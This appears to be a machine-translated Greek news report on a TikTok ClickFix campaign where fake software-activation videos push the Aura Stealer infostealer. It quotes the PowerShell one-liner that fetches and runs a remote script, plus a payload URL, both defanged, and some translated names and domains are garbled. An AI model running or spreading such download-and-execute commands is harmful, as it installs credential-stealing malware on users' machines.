Οι εγκληματίες του κυβερνοχώρου χρησιμοποιούν βίντεο TikTok μεταμφιεσμένα ως δωρεάν οδηγούς ενεργοποίησης για δημοφιλές λογισμικό όπως τα Windows, το Spotify και το Netflix για τη διάδοση κακόβουλου λογισμικού που κλέβει πληροφορίες.
Ο ISC Handler Xavier Mertens εντόπισε τη συνεχιζόμενη καμπάνια, η οποία είναι σε μεγάλο βαθμό η ίδια με αυτή που παρατήρησε η Trend Micro τον Μάιο
Τα βίντεο TikTok που βλέπει το BleepingComputer προσποιούνται ότι προσφέρουν οδηγίες για τον τρόπο ενεργοποίησης νόμιμων προϊόντων όπως τα Windows, το Microsoft 365, το Adobe Premiere, το Photoshop, το CapCut Pro και το Discord Nitro, καθώς και κατασκευασμένες υπηρεσίες όπως το Netflix και το Spotify Premium.
Πηγή: BleepingComputer.com
Τα βίντεο εκτελούν μια επίθεση ClickFix, η οποία είναι μια τεχνική κοινωνικής μηχανικής που παρέχει κάτι που φαίνεται να είναι νόμιμες “διορθώσεις” ή οδηγίες που ξεγελούν τους χρήστες να εκτελέσουν κακόβουλες εντολές PowerShell ή άλλα σενάρια που μολύνουν τους υπολογιστές τους με κακόβουλο λογισμικό.
Κάθε βίντεο εμφανίζει μια σύντομη εντολή μιας γραμμής και λέει στους θεατές να το εκτελέσουν ως διαχειριστής στο PowerShell:
iex (irm slmgr[.]win/photoshop)Θα πρέπει να σημειωθεί ότι το όνομα του προγράμματος στη διεύθυνση URL είναι διαφορετικό ανάλογα με το πρόγραμμα που πλαστοπροσωπείται. Για παράδειγμα, στα ψεύτικα βίντεο ενεργοποίησης των Windows, αντί για τη διεύθυνση URL που περιέχει photoshopθα περιλάμβανε παράθυρα.
Σε αυτήν την καμπάνια, όταν εκτελείται η εντολή, το PowerShell συνδέεται με τον απομακρυσμένο ιστότοπο slmgr[.]κερδίστε για να ανακτήσετε και να εκτελέσετε ένα άλλο σενάριο PowerShell.
Αυτό το σενάριο πραγματοποιεί λήψη δύο εκτελέσιμων αρχείων από τις σελίδες του Cloudflare, με το πρώτο εκτελέσιμο αρχείο λήψης από το https://file-epq[.]σελίδες[.]dev/updater.exe [VirusTotal]. Αυτό το εκτελέσιμο αρχείο είναι μια παραλλαγή του Κλέφτης Αύρας κακόβουλο λογισμικό κλοπής πληροφοριών.
Το Aura Stealer συλλέγει αποθηκευμένα διαπιστευτήρια από προγράμματα περιήγησης, cookie ελέγχου ταυτότητας, πορτοφόλια κρυπτονομισμάτων και διαπιστευτήρια από άλλες εφαρμογές και τα ανεβάζει στους εισβολείς, δίνοντάς τους πρόσβαση στους λογαριασμούς σας.
Ο Mertens λέει ότι θα γίνει λήψη ενός επιπλέον ωφέλιμου φορτίου, που ονομάζεται source.exe [VirusTotal]το οποίο χρησιμοποιείται για την αυτόματη μεταγλώττιση κώδικα χρησιμοποιώντας τον ενσωματωμένο μεταγλωττιστή Visual C# του .NET (csc.exe). Αυτός ο κωδικός στη συνέχεια εισάγεται και εκκινείται στη μνήμη.
Ο σκοπός του πρόσθετου ωφέλιμου φορτίου παραμένει ασαφής.
Οι χρήστες που εκτελούν αυτά τα βήματα θα πρέπει να θεωρούν ότι όλα τα διαπιστευτήριά τους έχουν παραβιαστεί και να επαναφέρουν αμέσως τους κωδικούς πρόσβασής τους σε όλους τους ιστότοπους που επισκέπτονται.
Οι επιθέσεις ClickFix έχουν γίνει πολύ δημοφιλείς τον περασμένο χρόνο, και χρησιμοποιούνται για τη διανομή διαφόρων τύπων κακόβουλου λογισμικού σε καμπάνιες κλοπής ransomware και κρυπτονομισμάτων.
Κατά γενικό κανόνα, οι χρήστες δεν πρέπει ποτέ να αντιγράφουν κείμενο από έναν ιστότοπο και να το εκτελούν σε ένα παράθυρο διαλόγου λειτουργικού συστήματος, συμπεριλαμβανομένης της γραμμής διευθύνσεων της Εξερεύνησης αρχείων, της γραμμής εντολών, των προτροπών PowerShell, του τερματικού macOS και των κελύφη του Linux.
Το 46% των περιβαλλόντων είχαν σπάσει κωδικούς πρόσβασης, σχεδόν διπλασιασμένος από 25% πέρυσι.
Λάβετε τώρα την Έκθεση Picus Blue 2025 για μια ολοκληρωμένη ματιά σε περισσότερα ευρήματα σχετικά με τις τάσεις πρόληψης, ανίχνευσης και διείσδυσης δεδομένων.
VIA: bleepingcomputer.com
